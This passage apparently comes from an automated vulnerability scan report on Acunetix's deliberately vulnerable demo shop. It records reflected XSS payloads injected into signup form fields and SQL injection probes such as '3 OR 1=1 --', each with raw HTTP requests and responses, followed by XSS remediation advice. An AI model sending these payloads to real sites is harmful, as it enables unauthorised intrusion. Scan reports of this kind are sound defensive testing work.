Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 176 Origin: http://testphp.vulnweb.com Connection: keep-alive Referer: http://testphp.vulnweb.com/signup.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 176 bytes. |
uuname=akpnUdBu&upass=&upass2=&urname=DsYmcvRO&ucc=%3C%2Fli%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E%3Cli%3E&uemail=RgLhBYOF&uphone=vkKtDSbY&uaddress=txqpnMEp&signup=signup
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:25:29 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 790 |
Response Body - size: 790 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title>add new user</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="style.css" rel="stylesheet" type="text/css"> </head> <body> <div id="masthead"> <h1 id="siteName">ACUNETIX ART</h1> </div> <div id="content"> <p>You have been introduced to our database with the above informations:</p><ul><li>Username: akpnUdBu</li><li>Password: </li><li>Name: DsYmcvRO</li><li>Address: txqpnMEp</li><li>E-Mail: RgLhBYOF</li><li>Phone number: vkKtDSbY</li><li>Credit card: </li><scrIpt>alert(1);</scRipt><li></li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div> </body> </html> |
URL | http://testphp.vulnweb.com/secured/newuser.php |
Method | POST |
Parameter | uemail |
Attack | </li><scrIpt>alert(1);</scRipt><li> |
Evidence | </li><scrIpt>alert(1);</scRipt><li> |
Request Header - size: 521 bytes. |
POST http://testphp.vulnweb.com/secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 176 Origin: http://testphp.vulnweb.com Connection: keep-alive Referer: http://testphp.vulnweb.com/signup.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 176 bytes. |
uuname=akpnUdBu&upass=&upass2=&urname=DsYmcvRO&ucc=VVsNLaLW&uemail=%3C%2Fli%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E%3Cli%3E&uphone=vkKtDSbY&uaddress=txqpnMEp&signup=signup
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:25:30 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 790 |
Response Body - size: 790 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title>add new user</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="style.css" rel="stylesheet" type="text/css"> </head> <body> <div id="masthead"> <h1 id="siteName">ACUNETIX ART</h1> </div> <div id="content"> <p>You have been introduced to our database with the above informations:</p><ul><li>Username: akpnUdBu</li><li>Password: </li><li>Name: DsYmcvRO</li><li>Address: txqpnMEp</li><li>E-Mail: </li><scrIpt>alert(1);</scRipt><li></li><li>Phone number: vkKtDSbY</li><li>Credit card: VVsNLaLW</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div> </body> </html> |
URL | http://testphp.vulnweb.com/secured/newuser.php |
Method | POST |
Parameter | uphone |
Attack | </li><scrIpt>alert(1);</scRipt><li> |
Evidence | </li><scrIpt>alert(1);</scRipt><li> |
Request Header - size: 521 bytes. |
POST http://testphp.vulnweb.com/secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 176 Origin: http://testphp.vulnweb.com Connection: keep-alive Referer: http://testphp.vulnweb.com/signup.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 176 bytes. |
uuname=akpnUdBu&upass=&upass2=&urname=DsYmcvRO&ucc=VVsNLaLW&uemail=RgLhBYOF&uphone=%3C%2Fli%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E%3Cli%3E&uaddress=txqpnMEp&signup=signup
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:25:30 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 790 |
Response Body - size: 790 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title>add new user</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="style.css" rel="stylesheet" type="text/css"> </head> <body> <div id="masthead"> <h1 id="siteName">ACUNETIX ART</h1> </div> <div id="content"> <p>You have been introduced to our database with the above informations:</p><ul><li>Username: akpnUdBu</li><li>Password: </li><li>Name: DsYmcvRO</li><li>Address: txqpnMEp</li><li>E-Mail: RgLhBYOF</li><li>Phone number: </li><scrIpt>alert(1);</scRipt><li></li><li>Credit card: VVsNLaLW</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div> </body> </html> |
URL | http://testphp.vulnweb.com/secured/newuser.php |
Method | POST |
Parameter | urname |
Attack | </li><scrIpt>alert(1);</scRipt><li> |
Evidence | </li><scrIpt>alert(1);</scRipt><li> |
Request Header - size: 521 bytes. |
POST http://testphp.vulnweb.com/secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 176 Origin: http://testphp.vulnweb.com Connection: keep-alive Referer: http://testphp.vulnweb.com/signup.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 176 bytes. |
uuname=akpnUdBu&upass=&upass2=&urname=%3C%2Fli%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E%3Cli%3E&ucc=VVsNLaLW&uemail=RgLhBYOF&uphone=vkKtDSbY&uaddress=txqpnMEp&signup=signup
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:25:28 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 790 |
Response Body - size: 790 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title>add new user</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="style.css" rel="stylesheet" type="text/css"> </head> <body> <div id="masthead"> <h1 id="siteName">ACUNETIX ART</h1> </div> <div id="content"> <p>You have been introduced to our database with the above informations:</p><ul><li>Username: akpnUdBu</li><li>Password: </li><li>Name: </li><scrIpt>alert(1);</scRipt><li></li><li>Address: txqpnMEp</li><li>E-Mail: RgLhBYOF</li><li>Phone number: vkKtDSbY</li><li>Credit card: VVsNLaLW</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div> </body> </html> |
URL | http://testphp.vulnweb.com/secured/newuser.php |
Method | POST |
Parameter | uuname |
Attack | </li><scrIpt>alert(1);</scRipt><li> |
Evidence | </li><scrIpt>alert(1);</scRipt><li> |
Request Header - size: 521 bytes. |
POST http://testphp.vulnweb.com/secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 176 Origin: http://testphp.vulnweb.com Connection: keep-alive Referer: http://testphp.vulnweb.com/signup.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 176 bytes. |
uuname=%3C%2Fli%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E%3Cli%3E&upass=&upass2=&urname=DsYmcvRO&ucc=VVsNLaLW&uemail=RgLhBYOF&uphone=vkKtDSbY&uaddress=txqpnMEp&signup=signup
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:25:24 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 790 |
Response Body - size: 790 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title>add new user</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="style.css" rel="stylesheet" type="text/css"> </head> <body> <div id="masthead"> <h1 id="siteName">ACUNETIX ART</h1> </div> <div id="content"> <p>You have been introduced to our database with the above informations:</p><ul><li>Username: </li><scrIpt>alert(1);</scRipt><li></li><li>Password: </li><li>Name: DsYmcvRO</li><li>Address: txqpnMEp</li><li>E-Mail: RgLhBYOF</li><li>Phone number: vkKtDSbY</li><li>Credit card: VVsNLaLW</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div> </body> </html> |
Instances | 14 |
Solution |
Phase: Architecture and Design
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
Phases: Implementation; Architecture and Design
Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.
For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.
Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.
Phase: Architecture and Design
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
Phase: Implementation
For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.
To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.
|
Reference |
http://projects.webappsec.org/Cross-Site-Scripting
http://cwe.mitre.org/data/definitions/79.html |
Tags |
OWASP_2021_A03
WSTG-v42-INPV-01 OWASP_2017_A07 |
CWE Id | 79 |
WASC Id | 8 |
Plugin Id | 40012 |
High |
SQL Injection |
---|---|
Description |
SQL injection may be possible
|
URL | http://testphp.vulnweb.com/AJAX/infoartist.php?id=5-2 |
Method | GET |
Parameter | id |
Attack | 5-2 |
Evidence | |
Request Header - size: 313 bytes. |
GET http://testphp.vulnweb.com/AJAX/infoartist.php?id=5-2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: */* Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/AJAX/index.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 220 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:27:29 GMT Content-Type: text/xml;charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 1285 |
Response Body - size: 1,285 bytes. |
<iteminfo><name>lyzae</name><description><p>
Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p> <p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p></description></iteminfo> |
URL | http://testphp.vulnweb.com/AJAX/infocateg.php?id=6-2 |
Method | GET |
Parameter | id |
Attack | 6-2 |
Evidence | |
Request Header - size: 312 bytes. |
GET http://testphp.vulnweb.com/AJAX/infocateg.php?id=6-2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: */* Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/AJAX/index.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 219 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:27:34 GMT Content-Type: text/xml;charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 324 |
Response Body - size: 324 bytes. |
<iteminfo><name>Graffity</name><description>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenati</description></iteminfo> |
URL | http://testphp.vulnweb.com/artists.php?artist=5-2 |
Method | GET |
Parameter | artist |
Attack | 5-2 |
Evidence | |
Request Header - size: 285 bytes. |
GET http://testphp.vulnweb.com/artists.php?artist=5-2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:27:39 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6193 |
Response Body - size: 6,193 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>artists</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>artist: lyzae</h2><div class='story'><p><p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p> <p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p></p><p><a href='listproducts.php?artist=3'>view pictures of the artist</a></p><p><a href='#' onClick="window.open('./comment.php?aid=3','comment','width=500,height=400')">comment on this artist</a></p></div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?artist=3+AND+1%3D1+--+ |
Method | GET |
Parameter | artist |
Attack | 3 OR 1=1 -- |
Evidence | |
Request Header - size: 311 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?artist=3+AND+1%3D1+--+ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php?artist=3 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:28:10 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4699 |
Response Body - size: 4,699 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?cat=4+AND+1%3D1+--+ |
Method | GET |
Parameter | cat |
Attack | 4 OR 1=1 -- |
Evidence | |
Request Header - size: 302 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?cat=4+AND+1%3D1+--+ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/categories.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:28:16 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4699 |
Response Body - size: 4,699 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability 